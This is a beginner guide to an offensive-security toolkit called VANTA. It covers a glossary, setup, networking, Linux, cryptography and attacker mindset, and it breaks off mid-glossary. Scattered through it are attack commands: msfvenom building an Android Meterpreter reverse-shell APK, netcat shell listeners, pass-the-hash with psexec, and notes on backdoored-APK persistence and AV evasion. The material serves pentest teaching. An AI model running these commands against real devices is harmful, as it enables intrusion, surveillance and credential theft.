VANTA / Docs / VANTA / Foundations
Complete Beginner Start Here

FoundationBefore You Touch Anything

This page is the entry point for anyone new to offensive security, penetration testing, or the VANTA toolkit. Read it first. It covers every term you will encounter across all modules, how the terminal works, OSI model, DNS, HTTP, Android and WiFi security architecture, payloads, reverse shells, OWASP Top 10, home lab setup, CTF strategy, and your first operation in under 10 minutes. No prior experience required. 22 sections, zero assumptions.

00 Your Learning Path

Where To Start

01
Read This Page
Learn every term in the glossary. Understand what ADB, payload, Meterpreter, and bore mean before running anything.
02
Set Up Prerequisites
Install VANTA, Metasploit, ADB, apktool, and bore on your attack machine. Everything you need is listed below.
See checklist →
03
First Run — netrecon
Run a basic network scan against your own machine to confirm everything is installed correctly. No target device needed.
See guide →
04
Pick a Module
Once comfortable with the basics, dive into a module. Each module page has a Beginner Startup section at the top.
Browse modules →
Legal reminder: All VANTA modules are tools for authorized penetration testing, security research, and CTF competitions only. Running these tools against systems you do not own or have written permission to test is illegal in most jurisdictions. Always confirm your scope and obtain written authorization before testing.
01 Glossary

Every Term You Need to Know

Penetration Testing — Core Concepts
Penetration Test (Pentest)
An authorized simulated attack on a system to find real vulnerabilities before a real attacker does. A pentest has a defined scope, a start/end date, and written permission from the system owner.
Red Team / Blue Team
Red Team = attackers (you, running VANTA). Blue Team = defenders (the security operations center watching for intrusions). Red teams simulate real adversaries to stress-test blue team detection.
CTF (Capture The Flag)
A security competition where participants exploit intentionally vulnerable machines to find hidden "flags" (strings of text). Safe, legal, and a great way to practice. Platforms: TryHackMe, HackTheBox, PicoCTF.
Scope
The defined boundary of a pentest — which IP addresses, domains, and systems are in scope (allowed to test) vs out of scope (off limits). Never test outside scope.
Vulnerability
A weakness in a system that could be exploited — e.g. an unpatched software bug, a misconfiguration, or a default password. Having a vulnerability doesn't mean it's been exploited.
Exploit
Code or technique that takes advantage of a vulnerability to produce an unintended effect on the target system — gaining access, crashing it, or escalating privileges.
CVE (Common Vulnerabilities & Exposures)
A standardized identifier for a known vulnerability. Format: CVE-YEAR-NUMBER. Example: CVE-2023-45866 is the Bluetooth HID injection vulnerability patched in December 2023.
CVSS Score
A 0–10 severity score assigned to a CVE. 0–3.9 = Low, 4–6.9 = Medium, 7–8.9 = High, 9–10 = Critical. Higher = more dangerous and/or easier to exploit.
Zero-Click Exploit
An attack that requires zero user interaction on the target — no clicks, no taps, no downloads. The most dangerous class of exploit. Example: CVE-2023-45866 injects keystrokes over Bluetooth without pairing.
One-Click Exploit
An attack that requires one user action — e.g. tapping a download link, opening a document, or installing an app. Social engineering is usually involved.
Privilege Escalation (LPE / PE)
Going from a lower-privilege access (normal user) to a higher-privilege one (root / admin / system). LPE = Local Privilege Escalation (already on the machine). Common next step after initial access.
Attack Surface
All the ways an attacker can potentially reach and interact with a target — open ports, installed apps, Bluetooth, WiFi, USB ports, web APIs. Reducing attack surface = better security posture.
Shells, Payloads & Access
Shell
A command-line interface on a remote machine that gives you execution control — you type commands, they run on the target. The end goal of most exploits.
Reverse Shell
The target connects back to you (the attacker). Used when the target is behind a firewall/NAT. You listen on your machine; the payload on the target calls home. Most common shell type in VANTA.
Bind Shell
The target opens a port and waits for you to connect. Works when you can reach the target directly (same LAN). Less common — firewalls often block inbound.
Payload
The code delivered to the target that gives you access — the shell, the backdoor, the Meterpreter agent. Generated by msfvenom. Examples: android/meterpreter/reverse_https, linux/x64/shell_reverse_tcp.
Staged vs Stageless Payload
Staged: small first stage calls back to download the full payload. Smaller initial file but requires callback. Stageless: everything in one file, no callback. Use stageless (/ vs _ in msfvenom name) for reliability across firewalls.
Meterpreter
Metasploit's advanced in-memory shell. Runs entirely in RAM (no file written to disk), encrypted, and extensible. Provides file browsing, camera access, keylogging, screen capture, and post-exploitation modules. The default payload in VANTA's android module.
Handler / Listener
The Metasploit process on your machine that waits for the payload to call back. Run via msfconsole -q -r handler.rc. Must be running before (or as soon as) the payload executes on the target.
LHOST / LPORT
LHOST = your machine's IP address the payload calls back to. LPORT = the port number your handler listens on. These are baked into the payload at generation time. For WAN delivery, use the bore tunnel IP/port.
RHOST / RPORT
RHOST = target's IP address. RPORT = target's port you're connecting to. Used for network-side exploits where you connect to the target (rather than waiting for callback).
Persistence
Ensuring your access survives a reboot or session reset. Techniques: adding a startup service, modifying system files, injecting a BootReceiver into an app. Without persistence, losing the shell means starting over.
C2 (Command and Control)
The infrastructure used to communicate with compromised devices after gaining access — sending commands, receiving output, exfiltrating data. VANTA's C2 module uses bore WAN tunnels for callback over the internet.
Exfiltration
Extracting data from a compromised system — files, credentials, messages, contacts. The data moves from target to attacker. Common post-exploitation objective.
Android-Specific
ADB (Android Debug Bridge)
A command-line tool for communicating with Android devices from a computer. Enables installing apps, running shell commands, pulling files, and more. Requires USB debugging to be enabled on the device. Most VANTA operations use ADB.
APK (Android Package)
The installable app file format for Android, equivalent to a Windows .exe. Contains compiled Java bytecode (DEX), resources, and a manifest. VANTA generates malicious APKs with embedded payloads using msfvenom.
Root / Rooted Device
A device where the operating system's security restrictions have been removed, granting full administrator (root) access. Unlocks the ability to read/write any file on the device. Most powerful but voids warranty. Magisk is the common rooting tool.
Android Security Patch Level
A date string (e.g. 2023-12-01) that indicates the latest Google security update applied to the device. Any CVE published before that date should be patched. Check: adb shell getprop ro.build.version.security_patch.
Smali
Human-readable representation of Android's DEX bytecode — the closest thing to assembly for Android apps. apktool decompiles APKs into smali. VANTA injects BootReceiver.smali into APKs to add persistence.
BootReceiver
An Android component that runs automatically when the device boots. VANTA injects one into payload APKs so the Meterpreter shell reconnects every time the device restarts — no re-delivery needed.
Intent
Android's messaging system for starting activities, services, or broadcast receivers. am start -a android.intent.action.VIEW -d URL is how VANTA opens a download URL on the device via ADB.
pm (Package Manager)
Android CLI tool for installing, uninstalling, and querying apps. pm install -r -t /sdcard/Download/app.apk installs an APK from the device's storage without user confirmation when run via ADB.
Unknown Sources
Android setting that must be enabled (per-app since Android 8) to install APKs from outside the Play Store. VANTA requires this enabled for the browser to allow APK installs. Check: Settings → Apps → Special App Access → Install unknown apps.
Frida
A dynamic instrumentation toolkit — attaches to a running process and injects JavaScript to modify behavior, bypass checks, or extract data. VANTA uses Frida + Objection for SSL pinning bypass, root detection bypass, and runtime memory analysis.
SSL Pinning
An app-level defense where the app only trusts a specific certificate (not just any valid one). Prevents traffic interception with Burp Suite. VANTA's Frida/Objection module bypasses pinning on rooted devices automatically.
DEX (Dalvik Executable)
The compiled bytecode format that Android runs. Multiple DEX files can exist in one APK (classes.dex, classes2.dex). JADX decompiles DEX back to readable Java. VANTA's DexClassLoader staging downloads and runs a DEX file at runtime.
Networking & Tunnels
LAN vs WAN
LAN = Local Area Network — devices on the same network (your home WiFi, same router). WAN = Wide Area Network — the internet. A reverse shell callback must reach your machine across the WAN if the target is not on your LAN.
NAT (Network Address Translation)
Your router hides your private IP behind one public IP. Incoming connections from the internet can't reach your machine directly. WAN tunnels (bore) solve this — they punch through NAT without port forwarding.
bore Tunnel
A lightweight TCP tunnel tool used in VANTA to expose local ports to the internet without port forwarding. bore local 4444 --to bore.pub makes your local port 4444 reachable at bore.pub:RANDOM_PORT. Used for WAN MSF callbacks and APK delivery.
Port / Port Number
A number (0–65535) that identifies a specific process on a networked device. Port 4444 is the Metasploit handler default. Port 80 is HTTP, 443 is HTTPS. LPORT in VANTA = the port your handler listens on.
HTTP vs HTTPS
HTTP = unencrypted web traffic (port 80). HTTPS = encrypted (port 443, uses TLS). For reverse shells across the internet, reverse_https payloads blend in with normal HTTPS traffic and pass through firewalls more reliably than raw TCP.
IP Address
A number that identifies a device on a network. Private (LAN): 192.168.x.x, 10.x.x.x, 172.16–31.x.x. Public (WAN): the address internet traffic uses. LHOST in VANTA should be your LAN IP for local testing or bore's IP for WAN.
MAC Address
A hardware identifier burned into every network adapter — format: XX:XX:XX:XX:XX:XX. Unique per device. VANTA's mac_spoof module randomizes or sets it to avoid device fingerprinting on networks.
L2CAP (Bluetooth)
Logical Link Control and Adaptation Protocol — Bluetooth's layer-2 protocol, analogous to TCP/IP but for Bluetooth. CVE-2023-45866 exploits raw L2CAP sockets connecting to Android's HID channels (PSM 0x11, 0x13) without authentication.
Tools Used by VANTA
Metasploit Framework (MSF)
The industry-standard exploitation framework. Contains hundreds of exploits, payloads, and post-exploitation modules. VANTA uses msfvenom to generate payloads and msfconsole to run the listener/handler.
msfvenom
Metasploit's payload generator. Creates APKs, EXEs, scripts, and raw shellcode with your chosen payload/LHOST/LPORT embedded. Example: msfvenom -p android/meterpreter/reverse_https LHOST=x.x.x.x LPORT=4444 -o payload.apk.
msfconsole
The interactive Metasploit shell. Runs handlers, exploits, and post-exploitation modules. VANTA generates a handler.rc resource script — run it with msfconsole -q -r handler.rc to start the listener automatically.
apktool
Decompiles APKs into smali code + resources, lets you modify them, then rebuilds. VANTA uses it to inject BootReceiver.smali and patch AndroidManifest.xml for persistence. Command: apktool d app.apk -o decoded/.
JADX
Decompiles DEX/APK bytecode into readable Java source code. Used in VANTA's static analysis operations to find hardcoded secrets, API keys, and vulnerable code patterns without running the app.
Frida
Dynamic instrumentation — injects JavaScript into running processes. Requires frida-server running on the Android device (push via ADB). VANTA uses it to bypass SSL pinning, root detection, and extract runtime secrets.
Objection
A mobile pentest toolkit built on Frida. Provides one-command bypasses for common Android/iOS defenses: android sslpinning disable, android root disable, memory dumps. VANTA wraps it in the objection_explore operation.
nmap
Network scanner — discovers live hosts, open ports, running services, and OS versions on a network. The backbone of VANTA's netrecon module. Most basic use: nmap -sV 192.168.1.0/24.
scrcpy
Screen mirror an Android device to your desktop via ADB. VANTA uses it in the screen_mirror operation for live visual access during a session.
apksigner
Signs APKs with a keystore (certificate). Android requires all APKs to be signed before installation. VANTA auto-generates a debug keystore (vanta_debug.keystore) for signing modified APKs after apktool patching.
VANTA Framework — Internal Terms
Module
A self-contained Python tool in VANTA. Each module has a name (e.g. android_pentest), a set of operations, and a JSON I/O protocol. Run from the VANTA shell: use android_pentest.
Operation
A specific action within a module, set via the operation parameter. Example: set operation recon runs device reconnaissance; set operation backdoor_apk injects a payload into an APK.
Params / Parameters
Input values for an operation: target device, IP address, port number, file paths, etc. Set in the VANTA shell with set param_name value before running. Listed per-operation in each module's documentation.
Findings
Structured JSON output from a module run — vulnerabilities found, files created, URLs generated, status codes. Printed as RESULT {...} to stdout. The VANTA shell parses these into the session.
Work Directory
Auto-created per-session folder at ~/.vanta/<module>/<device>/<timestamp>/. Contains all generated files: APKs, handler.rc, bore logs, decoded app sources. Browse it in the GUI's Files tab.
handler.rc
A Metasploit resource script auto-generated by VANTA. Contains the exact use / set PAYLOAD / set LHOST / exploit -j commands. Run it: msfconsole -q -r ~/.vanta/.../handler.rc.
GUI Mode
Run a module with mode=gui to launch a web-based control panel at http://localhost:PORT. The GUI provides form inputs for every operation, a live log stream, a file browser, and (for android_pentest) a C2 dashboard.
Bore WAN Tunnel
VANTA automatically opens a bore tunnel for every WAN-facing operation. The tunnel maps bore.pub:RANDOM_PORT → localhost:LPORT. The bore public URL is embedded in the payload at generation time so callbacks work across the internet.
02 Prerequisites

What You Need Installed

VANTA Core
  • git clone https://github.com/0xb0rn3/vanta
  • cd vanta && bash install.sh — installs all deps
  • Go 1.21+ for the shell binary
  • Python 3.10+ for all modules
  • Verify: ./vanta help
Android Testing
  • android-tools — ADB + fastboot: pacman -S android-tools
  • apktool: yay -S android-apktool-bin
  • metasploit: yay -S metasploit
  • bore: see rqm.md manual install
  • On device: Enable USB Debugging in Developer Options
  • On device: Enable Install Unknown Apps for your browser
Network Testing
  • nmap: pacman -S nmap nmap-ncat
  • masscan (optional): yay -S masscan
  • rustscan (optional): yay -S rustscan
  • Run scans as root for SYN scanning: sudo nmap
Bluetooth Testing
  • bluez + bluez-utils: pacman -S bluez bluez-utils
  • Start service: systemctl enable --now bluetooth
  • Unblock: rfkill unblock bluetooth
  • CAP_NET_RAW for BT sockets: sudo setcap cap_net_raw+eip $(which python3)
  • Physical Bluetooth adapter required (built-in or USB dongle)
Arch Linux / ChaOS / CachyOS: All VANTA dependencies are available via pacman (official repos) or yay (AUR). The install.sh script detects your distro and installs the right packages. For Debian/Ubuntu/Kali, equivalent apt packages are listed in tools/mobile/android/rqm.md.
03 First Run

Your First 10 Minutes

04 Module Index

All Modules — Difficulty & First Step

Module Category Difficulty What it does Your first operation
netrecon Network · Recon Beginner Scan a network for open ports, services, CVEs, and IoT devices using nmap/masscan/rustscan. set target 127.0.0.1 → run — scans your own machine
android_pentest Mobile · Android Intermediate Full Android pentest suite — recon, payload delivery, C2, Frida instrumentation, screen mirror, audio capture. set operation recon → run — read-only device info gathering
websec Web · Application Beginner Web application security scanning — SQLi, XSS, directory brute force, header analysis, auth bypass. set target http://testphp.vulnweb.com → run
wifi_monitor WiFi · Network Intermediate WiFi monitoring, WPA handshake capture, deauth attacks, beacon flood, evil twin setup. Requires a WiFi adapter that supports monitor mode. set operation scan → run
ios_pentest Mobile · iOS Advanced iOS app analysis, Frida hooks, plist extraction, keychain dumping. Requires jailbroken device or developer cert. Connect jailbroken iPhone via USB. set operation recon → run
windowsAD Windows · Active Directory Advanced AD enumeration, Kerberoasting, AS-REP roasting, pass-the-hash, DCSync, BloodHound integration. Requires an AD domain. set operation enum → run
adsec Active Directory · Offense Advanced Advanced AD attack chains — Golden/Silver ticket, DCSYNC, lateral movement, persistence. Use after windowsAD enumeration provides domain context.
iot_pwn IoT · Embedded Intermediate IoT device exploitation — firmware analysis, default credential testing, MQTT/Modbus/RTSP attacks. set operation scan → run — discovers IoT on local network
mac_spoof Network · Identity Beginner Randomize or set your network adapter's MAC address to avoid fingerprinting on target networks. set interface eth0 → set mode random → run
ctfpwn CTF · Binary Intermediate CTF-focused: binary exploitation, ROP chain building, format string, heap challenges. Integrates with pwntools. Download a CTF binary, set binary ./chall → set operation analyze → run
05 Networking Fundamentals

How Computers Communicate

Every VANTA module — netrecon, android_pentest, websec, wifi_monitor — touches network protocols. You don't need to memorize every RFC, but you need to understand IP addresses, ports, and packets well enough to read scan output and understand what's happening when an attack fires.

IP Addresses — What They Are at the Byte Level

IPv4 Address
An IPv4 address is exactly 4 bytes (32 bits), written as four decimal numbers 0–255 separated by dots. Each number is one byte. 
192.168.1.100
 ↑   ↑   ↑  ↑
 │   │   │  └─ 4th byte = 0x64 = 100
 │   │   └──── 3rd byte = 0x01 = 1
 │   └──────── 2nd byte = 0xA8 = 168
 └──────────── 1st byte = 0xC0 = 192

On the wire: C0 A8 01 64  (4 raw bytes in IP header)
Special Addresses
  • 127.0.0.1loopback — your own machine. Traffic never leaves the NIC.
  • 192.168.x.xprivate LAN — home/office network. Not routable on internet.
  • 10.x.x.x — another private range. VMs often use 10.0.2.x
  • 172.16–31.x.x — third private range. Docker uses 172.17.0.x
  • 255.255.255.255broadcast — every device on the subnet receives it
  • 0.0.0.0any/all interfaces — used in server binds (listen on all NICs)
Subnet / CIDR
A subnet is a range of IP addresses sharing the same network. CIDR notation: 192.168.1.0/24

The /24 means the first 24 bits (3 bytes) are the network = 192.168.1.
The last 8 bits are host addresses → 256 possible addresses → 254 usable (0=network, 255=broadcast)

/16 = 65,534 hosts  |  /24 = 254 hosts  |  /30 = 2 hosts

Ports — What They Are and Why They Matter

A port is a 16-bit number (0–65535) that identifies which application on a machine should receive incoming traffic. When your browser connects to a website, it connects to port 443 (HTTPS). Your mail client connects to port 993 (IMAPS). Ports let one machine run dozens of services simultaneously — the OS routes each incoming connection to the correct application based on the port number.
Port 22 — SSH
Secure Shell — encrypted remote terminal. If open on a server, attackers try credential brute force or stolen keys. ssh user@192.168.1.10
Port 80 — HTTP
Plain-text web traffic. All data visible on the wire — credentials, cookies, content. netrecon flags open HTTP on internal servers as a finding.
Port 443 — HTTPS
HTTP inside TLS encryption. Meterpreter uses this port for its C2 tunnel — traffic looks identical to normal web browsing to a firewall.
Port 445 — SMB
Windows file sharing. Used for lateral movement in Windows networks (PsExec, WMI). EternalBlue (WannaCry) ran on this port. Always flag this on internet-facing systems.
Port 3389 — RDP
Windows Remote Desktop. A very common entry point — organizations leave it internet-exposed, attackers brute force or use stolen credentials.
Port 5555 — ADB
Android Debug Bridge over TCP. If an Android device has this port open on the network, anyone can run ADB commands on it without authentication. netrecon's android preset specifically looks for this.
Port 1883 — MQTT
IoT messaging protocol. Smart home devices, sensors, and industrial equipment often use MQTT with no authentication. iot_pwn scans for open MQTT brokers.
Port 4444
Default Metasploit/Meterpreter handler port. Not a standard service — it's just conventional. VANTA uses it by default for LPORT. Change it to 443 or 8443 for better evasion.

What is a Packet?

When two computers communicate, they don't send one giant stream of data — they break it into packets. Each packet has a header (routing information) and a payload (the actual data). Routers read headers to forward packets; firewalls and IDS inspect headers and payloads to decide whether to allow or block traffic. 
┌────────────────────────────────────────────────────────────────┐
│  Ethernet Frame (Layer 2)                                      │
│  ┌──────────────────────────────────────────────────────────┐  │
│  │  IP Packet (Layer 3)                                     │  │
│  │  ┌────────────────────────────────────────────────────┐  │  │
│  │  │  TCP Segment (Layer 4)                             │  │  │
│  │  │  ┌──────────────────────────────────────────────┐  │  │  │
│  │  │  │  Application Data (Layer 7)                  │  │  │  │
│  │  │  │  e.g. "GET / HTTP/1.1\r\nHost: site.com\r\n" │  │  │  │
│  │  │  └──────────────────────────────────────────────┘  │  │  │
│  │  │  src_port: 52341   dst_port: 443                    │  │  │
│  │  │  seq: 0x11223344   ack: 0x44332211                  │  │  │
│  │  └────────────────────────────────────────────────────┘  │  │
│  │  src_ip: 192.168.1.50   dst_ip: 93.184.216.34           │  │
│  │  ttl: 64   protocol: 6 (TCP)                            │  │
│  └──────────────────────────────────────────────────────────┘  │
│  src_mac: aa:bb:cc:dd:ee:ff   dst_mac: 00:11:22:33:44:55      │
└────────────────────────────────────────────────────────────────┘

TCP vs UDP — Two Ways to Send Data

TCP — Reliable
  • Connection-oriented — 3-way handshake before data flows (SYN → SYN-ACK → ACK)
  • Guaranteed delivery — lost packets are automatically re-sent
  • In-order — packets re-assembled in correct sequence
  • Used by: HTTP/HTTPS, SSH, SMB, Meterpreter, ADB, most attack tools
  • nmap SYN scan (-sS) sends a SYN, waits for SYN-ACK to confirm port open
UDP — Fast
  • Connectionless — no handshake, just send and hope it arrives
  • No delivery guarantee — lost packets are gone
  • Used by: DNS (port 53), DHCP, SNMP, MQTT, NTP, streaming
  • nmap UDP scan (-sU) is slow — closed ports send ICMP port unreachable; open ports often say nothing
  • DNS is a common lateral movement vector — DNS queries bypass many firewalls
06 The Attack Lifecycle

How Attacks Actually Work

Real attacks follow a pattern. Lockheed Martin's Cyber Kill Chain and MITRE's ATT&CK framework document these stages. Understanding the lifecycle tells you which VANTA module applies at each phase.

01
Reconnaissance
Gather intelligence about the target — IP ranges, open ports, services, employees, technologies, and potential vulnerabilities. All passive or lightly active, before any exploitation.
VANTA module: netrecon
02
Weaponization
Build or customize the attack tool — create a malicious APK, generate a payload, prepare DuckyScript, craft a SQL injection string. The weapon is ready but not yet deployed.
VANTA modules: android_pentest, revshell, badusb
03
Delivery
Get the weapon to the target — send a phishing link, plug in a USB device, push the APK via ADB/QR/Bluetooth, send a crafted HTTP request. Delivery is where social engineering often plays a role.
VANTA modules: badusb, android_pentest (bt_zero_deliver)
04
Exploitation
The weapon triggers — the vulnerability is exploited. An installed APK launches Meterpreter. A SQL injection extracts the database. A buffer overflow spawns a shell. Exploitation is the moment of initial access.
VANTA modules: android_pentest, websec, windowsAD
05
Installation
Establish persistence — install a backdoor, register a BootReceiver, create a scheduled task, add a registry key — so access survives reboots, logouts, and password changes.
VANTA modules: android_pentest (boot_persist), windowsAD (persist)
06
Command & Control (C2)
The compromised system connects back to the attacker — a Meterpreter session, a reverse shell, a Sliver agent. The attacker now has an interactive channel to issue commands and receive output.
VANTA modules: revshell, android_pentest (c2_gui), windowsAD (sliver)
07
Actions on Objectives
Execute the actual goal — dump credentials, exfiltrate files, move laterally to other systems, escalate privileges, access the final target. In a pentest, this phase produces the evidence for the report.
VANTA modules: windowsAD (loot, secrets), android_pentest (file_manager, process_inject), websec (sqli data extraction)
MITRE ATT&CK: A comprehensive framework cataloguing every known attacker technique by tactic and platform. Free at attack.mitre.org. When VANTA finds a vulnerability, cross-referencing ATT&CK gives you the exact technique ID to include in your pentest report — e.g. T1190 (Exploit Public-Facing Application) or T1059.001 (PowerShell).
07 Linux Survival Guide

Linux Commands You Must Know

VANTA runs on Linux (Kali, Arch, Ubuntu). Every module uses the terminal. You don't need to be a Linux expert, but you need to be comfortable with the commands below — they appear in module outputs, dependency installation, and troubleshooting.

File System Navigation

pwd                   # Print Working Directory — where you are right now
ls -la                # List files including hidden (.) files + permissions
ls -lh /path          # Human-readable sizes (KB, MB, GB)
cd /home/user/VANTA    # Change directory (absolute path)
cd ..                 # Go up one directory
cd ~                  # Go to your home directory (/home/username)
mkdir -p a/b/c        # Create nested directories (no error if exists)
rm -rf dir/           # Delete directory and all contents (irreversible — be careful)
cp -r src/ dst/       # Copy directory recursively
mv old.txt new.txt    # Move/rename a file
find . -name "*.py"   # Find files matching pattern in current directory
which nmap            # Show full path of a command (/usr/bin/nmap)

Reading and Writing Files

cat file.txt           # Print entire file to terminal
less file.txt          # Scrollable file viewer (q to quit)
head -n 20 file.txt    # First 20 lines
tail -f /var/log/syslog # Follow file as it grows (live logs)
grep "error" file.txt  # Find lines containing "error"
grep -r "password" .   # Recursively grep entire directory
grep -i "ERROR" *.log  # Case-insensitive grep
echo "text" > file.txt # Write text to file (overwrites)
echo "text" >> file.txt # Append text to file
nano file.txt          # Simple text editor (Ctrl+X to save+exit)

Networking Commands (Essential for Pentesting)

ip a                   # Show all network interfaces + IP addresses
ip route               # Show routing table (default gateway)
hostname -I            # Print your IP(s) — quick way to find your LHOST
ss -tulpn              # Show all listening ports + which process
netstat -tulpn         # Alternative to ss (older systems)
ping -c4 192.168.1.1   # Test connectivity (4 packets)
traceroute 8.8.8.8     # Trace route to destination
curl -I https://site.com  # Fetch just HTTP headers
wget https://site.com/file -O local.file  # Download file
nc -lvnp 4444          # Start netcat listener on port 4444 (catch shells here)
nc 192.168.1.50 4444   # Connect to remote host:port

Process and Permissions

ps aux                 # List all running processes
ps aux | grep python3  # Find specific process
kill -9 PID            # Force kill process by PID
sudo command           # Run command as root (you'll need this for nmap -sS)
sudo -l                # List what you can run as sudo (useful post-exploit)
chmod +x script.sh     # Make script executable
chmod 700 file         # Owner can read/write/execute, others: nothing
id                     # Show your current user ID and groups
whoami                 # Just your username
su - alice             # Switch to user alice (if you know the password)
# "uid=0(root)" in id output = you have root / full control

Package Management (Install Tools)

# Arch / CachyOS (VANTA's primary platform):
sudo pacman -S nmap    # Install nmap
yay -S apktool         # Install from AUR (community packages)
sudo pacman -Syu       # Update all packages

# Kali / Debian / Ubuntu:
sudo apt update        # Refresh package list first
sudo apt install nmap  # Install nmap
sudo apt install -y metasploit-framework  # Install Metasploit

# Python packages (any distro):
pip3 install frida-tools        # Install Python package
pip3 install --break-system-packages impacket  # Force install on newer Python
08 Cryptography Essentials

Crypto From Zero

Cryptography appears in every VANTA module — password hashes in AD attacks, APK signing, TLS in Meterpreter's HTTPS transport, WPA2's 4-way handshake. You don't need to implement crypto, but you need to understand what hashes are, why symmetric and asymmetric encryption differ, and how TLS protects (and doesn't protect) network traffic.

Hashing — One-Way Functions

What is a Hash?
A hash function takes any input and produces a fixed-size output. It's one-way: you can't reverse a hash back to the input (mathematically). Same input always produces same output. Different input produces completely different output. 
sha256("password") = 5e884898da28047151d0e56f8dc6292773603d0d6aabbdde5...
sha256("Password") = a665a45920422f9d417e4867efdc4fb8a04a1f3fff1fa07e99...
                     # One capital letter → completely different hash
How Passwords are Stored
  • Websites store the hash of your password, not the password itself
  • At login: hash your input, compare to stored hash. Never compare plain text.
  • NTLM hash (Windows AD): MD4(UTF-16LE(password)) — fast to compute, fast to crack
  • bcrypt/scrypt/Argon2 (modern web): intentionally slow — 100ms/hash → brute force impractical
  • WPA2 PMK: PBKDF2(password, SSID, 4096 rounds) — why WiFi cracking needs GPU
  • Cracking = try millions of passwords, hash each, compare to stolen hash
Hash in Windows AD
## NTLM hash format in secretsdump output:
Administrator:500:LM_HASH:NT_HASH:::
                   ↑        ↑
                   │        └─ NT hash (MD4 of UTF-16LE password)
                   └────────── LM hash (old, often disabled)

## Pass-the-Hash: authenticate with the NT hash directly
## No need to crack it — Windows NTLM protocol accepts the hash
python3 psexec.py -hashes :NT_HASH_HERE domain/User@target

Symmetric vs Asymmetric Encryption

Symmetric (AES)
One key encrypts AND decrypts. Both sides must share the key before communicating. Fast — used to encrypt actual data (files, traffic).

AES-256: 256-bit key. The most common. Used in WPA2 (CCMP), TLS data encryption, BitLocker, APK signing (after key exchange).
Asymmetric (RSA / ECDSA)
Two mathematically linked keys: a public key (share with everyone) and a private key (keep secret). Encrypt with public → only private key can decrypt. Sign with private → anyone with public key can verify.

Used in: TLS certificate exchange, APK signing (Android), SSH key authentication, code signing.
TLS / HTTPS
TLS combines both: asymmetric to exchange a symmetric session key securely, then symmetric to encrypt all data.

Why Meterpreter HTTPS bypasses firewalls: traffic is valid TLS on port 443. Without decrypting TLS, firewalls see normal HTTPS — they can't inspect the Meterpreter TLV payload inside.

Base64 — Encoding vs Encryption

Base64 is not encryption — it's an encoding scheme that converts binary data to printable ASCII characters. Anyone can decode it instantly with no key. It's used to safely carry binary data through text-only channels (email, URLs, XML, PowerShell). badusb uses base64 to embed PowerShell scripts in DuckyScript; Android payloads use it to hide shell commands in APK resource files. 
# Base64 encode/decode on Linux:
echo "id; whoami" | base64          # → aWQ7IHdob2FtaQo=
echo "aWQ7IHdob2FtaQo=" | base64 -d # → id; whoami

# In PowerShell (Windows — badusb uses this):
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("id; whoami"))
# → Note: PowerShell's -EncodedCommand uses UTF-16LE, not UTF-8

# Detect base64 in the wild: length divisible by 4, only [A-Za-z0-9+/=] chars
# Always decode suspicious base64 strings you find in web apps, APKs, scripts
09 Attacker's Mindset

Think Like a Red Teamer

The biggest difference between a script kiddie and a skilled pentester isn't the tools — it's the mental model. Understanding why attacks work makes you effective even when the tools fail, and makes your reports genuinely useful to the defenders.

Attack Surface Thinking
Every input is a potential injection point. Every open port is a potential entry. Every trust relationship is a potential lateral movement path. When you look at a system, ask: "what accepts input here, and what happens if that input is malicious?"
Assume Breach
Real red teams operate on the premise that the perimeter is already compromised. Don't stop at the first shell — go deeper. What can you reach from here? What credentials are in memory? Who else trusts this machine?
Least Resistance
Attackers don't exploit complex 0-days when a default password works. Always check the easy things first: default credentials, open ADB, unpatched services, misconfigured permissions. 80% of real breaches use known techniques.
Defense Evasion is Part of the Job
A payload that gets caught by AV is a failed operation. Understanding why tools get detected — signatures, behavioral heuristics, EDR hooks — teaches you how to evade them. Every VANTA module has an OPSEC section for this reason.
Read Error Messages
Error messages are a pentester's best friend. A verbose error from a web app may leak the database type, version, file paths, and query structure — more useful than a successful response. Never skip reading error output.
Document Everything
A pentest with no report is just unauthorized hacking. Every finding needs evidence: screenshots, command output, timestamps. VANTA's structured JSON output is designed to feed directly into professional reports.

Understanding Trust Relationships

# Trust is the core concept of all privilege escalation

Web server trusts:  user input in GET/POST parameters
                    → SQL injection, XSS, command injection

Android trusts:     apps installed with the right signature
                    → we re-sign a backdoored APK with our cert → Play Protect bypass

Windows AD trusts:  any authenticated domain account for LDAP enumeration
                    → low-priv user can enumerate entire domain structure

Kerberos trusts:    any account can request a TGS for any SPN
                    → Kerberoasting: request service ticket, crack it offline

SSH trusts:         key files in ~/.ssh/authorized_keys
                    → find a private key in a repo/config → ssh as that user

# Every trust relationship is a potential attack path
# Your job: find the shortest chain of trust relationships to your goal
10 Advanced Glossary

Deeper Terms — Protocol & Tool Level

Network Protocols
TCP 3-Way Handshake
The connection setup protocol: Client sends SYN → Server replies SYN-ACK → Client replies ACK. nmap SYN scan (-sS) only sends SYN — a port is open if it receives SYN-ACK, filtered if it receives nothing, closed if it receives RST.
DNS (Domain Name System)
Translates domain names (google.com) to IP addresses. Port 53 (UDP/TCP). Attackers use DNS as a C2 channel (DNS tunneling) since most firewalls allow outbound DNS. Out-of-band SQLi can exfiltrate data via crafted DNS queries.
DHCP (Dynamic Host Configuration)
Automatically assigns IP addresses to devices on a network. Port 67/68 (UDP). Rogue DHCP server attack: attacker's server responds faster than the real one, assigns victim a "default gateway" pointing to attacker → MITM all traffic.
ARP (Address Resolution Protocol)
Maps IP addresses to MAC addresses on a LAN. ARP has no authentication — ARP poisoning (spoofing) lets an attacker tell a victim "I am the router" to intercept traffic. Used in wifi_monitor's MITM mode.
ICMP (Ping Protocol)
Used to test connectivity (ping). Type 8 = echo request (ping), Type 0 = echo reply (pong). ICMP tunneling can carry data inside ping packets, bypassing firewalls that allow ICMP but block TCP/UDP.
TTL (Time To Live)
A counter in IP packets that decrements at each router hop. When TTL=0, the packet is dropped. Default: Linux = 64, Windows = 128, Cisco = 255. A response with TTL=127 → originated from a Windows machine (128-1=127 after one hop).
Binary Exploitation
Buffer Overflow
Writing more data into a fixed-size memory buffer than it can hold, overwriting adjacent memory. Classic attack: overwrite the return address on the stack to redirect execution to attacker-controlled code (shellcode). ctfpwn's stack_smash operation automates this.
ROP Chain (Return-Oriented Programming)
An exploitation technique that chains together existing code fragments ("gadgets") in a program to execute arbitrary operations, bypassing no-execute (NX/DEP) protections that prevent shellcode execution. ctfpwn's rop_build operation builds these automatically.
ASLR (Address Space Layout Randomization)
OS protection that randomizes where code, stack, and heap load in memory at each execution. Makes it harder to target fixed memory addresses in exploits. Bypassed via information leaks, brute force (32-bit), or format string vulnerabilities.
Shellcode
